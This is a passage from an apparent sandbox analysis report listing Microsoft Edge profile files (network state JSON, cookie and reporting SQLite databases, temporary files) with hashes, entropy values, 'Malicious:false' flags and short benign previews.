                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:20.034 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/10/28-17:02:20.037 19e8 Recovering log #3.2024/10/28-17:02:20.039 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\336af243-ee73-4259-a905-87041dfb975d.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                                                                                                Size (bytes):1546
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.338944532473121
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:YcgCzsF2tsFEfc7leeBkBRs8fCgHWbxo+:FS2SE2keBkB/TWVo+
                                                                                                                                                                                                                                                                                                                                MD5:B41E9CEF173E95CD3F7817E4771A49ED
                                                                                                                                                                                                                                                                                                                                SHA1:A7832A40350E955129B5B74998E2061C0D3303D8
                                                                                                                                                                                                                                                                                                                                SHA-256:CDF35C49F829F1BFBD5DA7CE484953212E1B6565FC929BC60A20EAAA584012B9
                                                                                                                                                                                                                                                                                                                                SHA-512:8C5EF75A8F1DB36E5AAF211ACF5FBD0E5B6428164CBBD6BC2EC7F39D2EF43D12C82EC702CFC0C8D926B647618338399578D5EC3C3E4DE122DE8FD76B8E10FF5F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13377214942502763","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13377214946469343","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://edge.microsoft.com","supports_spdy":true},

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\4f90cb45-d4cc-4f4f-8810-e5bd055588eb.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\66bd3064-2674-43ba-b900-94ce976fd08c.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1419
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.336394944460292
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7nbI+:YXs/tsbfc7leeEscgCgakhYhbxo+
                                                                                                                                                                                                                                                                                                                                MD5:BF6BA1797785A5763A0088569A24FE85
                                                                                                                                                                                                                                                                                                                                SHA1:62B9D7386B7BDD97B816063ED0D9CC0D912EB130
                                                                                                                                                                                                                                                                                                                                SHA-256:40C6B39ED9B1E473CBD7027290D7996D15139F0B5BDC4BA6769E8FE8467BBA4E
                                                                                                                                                                                                                                                                                                                                SHA-512:FE46026F5F2C16522DBA26D256C0831DA94254C432E5C2CC77F864E6D7E0F1D9C66A50726AF91B06D54EC124C21D1C73744CB2D9CC016BD9FE7200823698D729
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 9, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.308916760708268
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:ieX0edqh0K/eUO4hK1LhMOaEEWdXtoJK79DoqMyR9F730hL:is0Cqh0KmUO4hkCWd9r79DoqMyR/IhL
                                                                                                                                                                                                                                                                                                                                MD5:6BD3871561E71E2038AB08A5282BD927
                                                                                                                                                                                                                                                                                                                                SHA1:CB4D8C8C7838328FE620BDD301E4268DB2401D51
                                                                                                                                                                                                                                                                                                                                SHA-256:285BE97D094922F51AFFE40B9A2D2A25E29C750D5F5434A46F5E4BB5F4A4599D
                                                                                                                                                                                                                                                                                                                                SHA-512:7CFCC1F5E4C4CE70D0E462E32A08880C6F5721ECC399BF0D0B9C9D6A580366578469DB1DB3C5690D4E778BB4220A866171442B0927E5E9B1593BC8137B0673C3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1419
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.336394944460292
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7nbI+:YXs/tsbfc7leeEscgCgakhYhbxo+
                                                                                                                                                                                                                                                                                                                                MD5:BF6BA1797785A5763A0088569A24FE85
                                                                                                                                                                                                                                                                                                                                SHA1:62B9D7386B7BDD97B816063ED0D9CC0D912EB130
                                                                                                                                                                                                                                                                                                                                SHA-256:40C6B39ED9B1E473CBD7027290D7996D15139F0B5BDC4BA6769E8FE8467BBA4E
                                                                                                                                                                                                                                                                                                                                SHA-512:FE46026F5F2C16522DBA26D256C0831DA94254C432E5C2CC77F864E6D7E0F1D9C66A50726AF91B06D54EC124C21D1C73744CB2D9CC016BD9FE7200823698D729
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF48e42.TMP (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1419
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.336394944460292
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7nbI+:YXs/tsbfc7leeEscgCgakhYhbxo+
                                                                                                                                                                                                                                                                                                                                MD5:BF6BA1797785A5763A0088569A24FE85
                                                                                                                                                                                                                                                                                                                                SHA1:62B9D7386B7BDD97B816063ED0D9CC0D912EB130
                                                                                                                                                                                                                                                                                                                                SHA-256:40C6B39ED9B1E473CBD7027290D7996D15139F0B5BDC4BA6769E8FE8467BBA4E
                                                                                                                                                                                                                                                                                                                                SHA-512:FE46026F5F2C16522DBA26D256C0831DA94254C432E5C2CC77F864E6D7E0F1D9C66A50726AF91B06D54EC124C21D1C73744CB2D9CC016BD9FE7200823698D729
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.4787049231277765
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBfWw:uIEumQv8m1ccnvS6/Dow0Wj38rcOJ0
                                                                                                                                                                                                                                                                                                                                MD5:08D839072A0839176D177CFDF5070C06
                                                                                                                                                                                                                                                                                                                                SHA1:BC61B8C02F553001C6C7F702EC6FBF624793744C
                                                                                                                                                                                                                                                                                                                                SHA-256:C48A6E060B69C46ADBF1B6397F955C1E514830DCBBB20D4C80279B20323EE093
                                                                                                                                                                                                                                                                                                                                SHA-512:3043C48679F0A151B0013EFA3185917B0C31EE687CBAC55BEC2C261639D3B60E3F8D90D52E2FF766FCA4F503346B24D6CD1E755F91EA96C71B6B5BC4D3A00992
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF38415.TMP (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF391f0.TMP (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF392bb.TMP (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\c8c9842c-260f-4604-9f7c-e418f1cd9f19.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\dc1b773f-ab2b-48d1-bff7-6291c6dd4b90.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\e8290862-be67-4dd7-8e26-b7b8c9376c24.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:[]

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\edf67c98-7aa2-4263-be1e-472e1e460beb.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                                                                MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                                                                SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                                                                SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                                                                SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
